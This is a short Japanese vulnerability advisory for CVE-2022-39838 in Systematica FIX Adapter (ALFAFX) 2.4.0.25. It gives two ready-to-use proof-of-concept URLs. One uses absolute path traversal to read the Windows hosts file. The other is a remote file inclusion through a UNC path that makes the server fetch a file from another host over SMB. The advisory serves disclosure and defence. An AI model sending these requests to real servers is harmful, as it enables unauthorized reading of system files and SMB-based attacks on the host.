
CVE-2022-39838の概念実証エクスプロイト。Systematica FIX Adapter (ALFAFX) 2.4.0.25におけるHTTPリクエストを介したリモートファイルインクルージョンと絶対パストラバーサルを実証します。
Systematica FIX Adapter (ALFAFX) 2.4.0.25 13/09/2017 は、UNC共有パス名を介したリモートファイルインクルージョンを許可し、またローカルパス名への絶対パストラバーサルも許可します。
PoC:
http://192.168.88.11:8888/info?page=logfile&file=C:\Windows\System32\drivers\etc\hosts
http://192.168.88.11:8888/info?page=logfile&file=\\192.168.88.100\rfi\test.txt
不適切なアクセス制御
Systematica
Systematica FIX Adapter (ALFAFX) - 2.4.0.25 (Build 13/09/2017)
リモート
はい
リモートユーザーは絶対パスを介してOS内の任意のファイルにアクセスできます。また、リモートユーザーは脆弱なサーバーにSMB経由で別のマシンからファイルを要求させることができます。
Ivashchenko Sergey (Jet Infosystems, jet.su)